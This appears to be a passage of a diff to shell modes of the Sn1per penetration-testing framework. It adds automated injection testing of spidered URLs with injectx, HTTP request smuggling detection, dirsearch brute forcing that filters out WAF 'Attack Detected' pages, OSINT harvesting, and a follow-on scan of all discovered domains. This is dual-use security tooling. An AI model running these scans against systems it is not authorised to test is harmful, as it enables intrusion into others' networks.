cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -51,6 +51,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$INJECTX" == "1" ]]; then
|
||||
rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null
|
||||
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
|
||||
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done;
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -61,7 +67,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
|
||||
|
|
@ -72,7 +78,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
|
||||
|
|
@ -83,7 +89,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
|
||||
|
|
@ -150,6 +156,13 @@ if [[ "$MODE" = "web" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SMUGGLER" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u http://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port80.txt
|
||||
fi
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
|
|
|
|||
|
|
@ -10,25 +10,25 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -36,7 +36,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
|
||||
blackwidow -u https://$TARGET:443 -l 3 -v n
|
||||
cp -f /usr/share/blackwidow/"$TARGET"_443/"$TARGET"_443-*.txt $LOOT_DIR/web/ 2>/dev/null
|
||||
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -51,6 +51,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$INJECTX" == "1" ]]; then
|
||||
rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null
|
||||
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt
|
||||
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done;
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -61,7 +67,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
|
||||
|
|
@ -72,7 +78,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
|
||||
|
|
@ -83,7 +89,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
|
||||
|
|
@ -149,6 +155,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SMUGGLER" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u https://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port443.txt
|
||||
fi
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
|
|
|
|||
|
|
@ -32,12 +32,9 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING THEHARVESTER OSINT INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python2.7 $THEHARVESTER_PATH -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
cp -f /etc/theHarvester/api-keys.yaml ~/api-keys.yaml 2> /dev/null
|
||||
cd ~ 2> /dev/null
|
||||
theharvester -d $TARGET -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,google,hunter,intelx,linkedin,linkedin_links,netcraft,otx,securityTrails,spyse,threatcrowd,trello,twitter,vhost,virustotal,yahoo 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
theharvester-3.1 -d $TARGET -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,google,hunter,intelx,linkedin,linkedin_links,netcraft,otx,securityTrails,spyse,threatcrowd,trello,twitter,vhost,virustotal,yahoo 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
cd $INSTALL_DIR 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_THEHARVESTER" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/theharvester-$TARGET.txt"
|
||||
|
|
|
|||
|
|
@ -104,7 +104,7 @@ if [[ "$RECON" = "1" ]]; then
|
|||
fi
|
||||
if [[ "$RAPIDDNS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING GITHUB SUBDOMAINS $RESET"
|
||||
echo -e "$OKRED GATHERING RAPIDDNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null
|
||||
fi
|
||||
|
|
@ -177,6 +177,12 @@ if [[ "$RECON" = "1" ]]; then
|
|||
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "$RESET"
|
||||
if [[ "$STATIC_GREP_SEARCH" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING INTERESTING DOMAINS SEARCH $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
egrep -iE "GREP_INTERESTING_SUBDOMAINS" $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | tee $LOOT_DIR/domains/domains_interesting-$TARGET.txt | head -n "$GREP_MAX_LINES"
|
||||
fi
|
||||
if [[ "$SPOOF_CHECK" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
|
|
@ -255,6 +261,12 @@ if [[ "$RECON" = "1" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/ips/subnets-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$SCAN_ALL_DISCOVERED_DOMAINS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED STARTING FLYOVER SCAN OF ALL DOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sniper -f $LOOT_DIR/domains/domains-$TARGET-full.txt -m flyover -w $WORKSPACE
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
|
|||
|
|
@ -1,17 +1,16 @@
|
|||
for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
#echo $file
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -5,11 +5,11 @@
|
|||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
